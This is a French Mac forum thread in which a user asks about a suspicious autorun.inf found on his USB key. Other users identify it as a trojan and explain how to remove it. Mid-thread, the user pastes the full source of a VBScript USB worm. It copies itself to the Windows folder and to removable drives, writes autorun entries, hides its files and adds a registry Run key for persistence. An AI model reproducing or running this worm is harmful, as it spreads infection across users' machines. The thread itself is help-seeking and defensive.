Fichier executable UNIX, virus?

[benvs86]

Bonjour,

En passant ma clé USB sur un pc windows VISTA, celui-ci a détecté lors du branchement un fichier exécutable UNIX qu'il a qualifié de cheval de troie. Je n'ai aucune idée d'où provine tce fichier mais quand j'essaie de le supprimer (avec mon mac) on me dit que le fichier est vérrouillé, je peux le supprimer mais en insitant. Est-ce un fichier nécessaire au bon fonctionnnement de ma clé USB ou dois-je e supprimer afin de ne pas affecter mes amis sous windows lors de transfert de fichiers?


Le nom du fichier est:

autorun.inf

La clé USB est une kingston mauve de 4GB.


D'avançe merci pour tout aide

Benoit

 

[TibomonG4]

Bonjour

Pomme i sur le fichier, déverrouiller. Ensuite, regarder ce qu'il contient avec TextEdit. Éventuellement faites un copier/coller ici.

 

[benvs86]

Voila ce qu'il contient, perso je n'en sais pas plus:



"'My name is Slow but sure V0.05
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname"

 

[Anonyme]

normalement, autorun.inf est un fichier texte, auquel on rajoute l'extension .INF, qui mis à la racine du CD l'ouvre automatiquement à l'insersion.
ce fichier contient un exécutable pour ouvrir un fichier:

[autorun]
open = TITRE.exe

*******
Trojan déjà listé...

 

[TibomonG4]

Ok, vu son contenu et maintenant que vous savez comment le déverrouiller direction la poubelle.

Pour le supprimer sous Windows (source post n°20)

Concernant les FICHIER Autorun.inf dans un clé usb.
1- Comment voir le contenu du fichier sans risque ?
a°/ Ouvrir poste de travail.
b°/ Ecrire ceci dans la barre d'adresse. "§:\Autorun.inf" et valider avec Entrée
:NB: Il faut remplacer "§" par le nom du clé. (Ex: E:\Autorun.inf)
c°/ Si le contenu du fichier vous semble suspect alors n'hesiter pas à le supprimer.
d°/ Interessé vous à la ligne où ceci est écris "shell\open=´" ou "shell\execute" etc ... Noter bien le nom de fichier après le signe "=" car C lui le responsable de tous. "cftmonn.exe ou j'sais po"
2- Comment le supprimer ?
a°/ Aller dans Démarrer/Executer et ecriver "cmd". (Invite de commande)
b°/ Passer au lecteur voulu ou "usb" en tapant "cd /d §:"
:NB: "§" etant le nom du lecteur (Ex : cd /d e : )
c°/ Regarder si le fichier y est.
"type Autorun.inf"
d°/ Supprimer le fichier en tapant "del /a /f -r Autorun.inf"
e°/ Ejecter le lecteur.
f°/ Re-inserer la clé et reverifier si le fichier Autorun.inf y est.
g°/ Si il y est alors votre Ordinateur est déjainfecté par le virus.
h°/ Si c'est le cas alors commencer par télécharger "Hijackthis et Combofix".

 

[Le Gognol]

Je n'ai aucune idée d'où provine tce fichier

De toute évidence, d'un PC (et pas de ton Mac).

'+

 

[bompi]

Si maintenant on commence à s'intéresser aux fichiers autorun.inf dans le forums OS X, je sens que je vais passer de mauvaises journées ... :rateau:
Comme la solution est explicitée, on va s'arrêter là.

PS : en plus, qualifier un fichier autorun.inf d'exécutable UNIX, c'est dur. Très dur.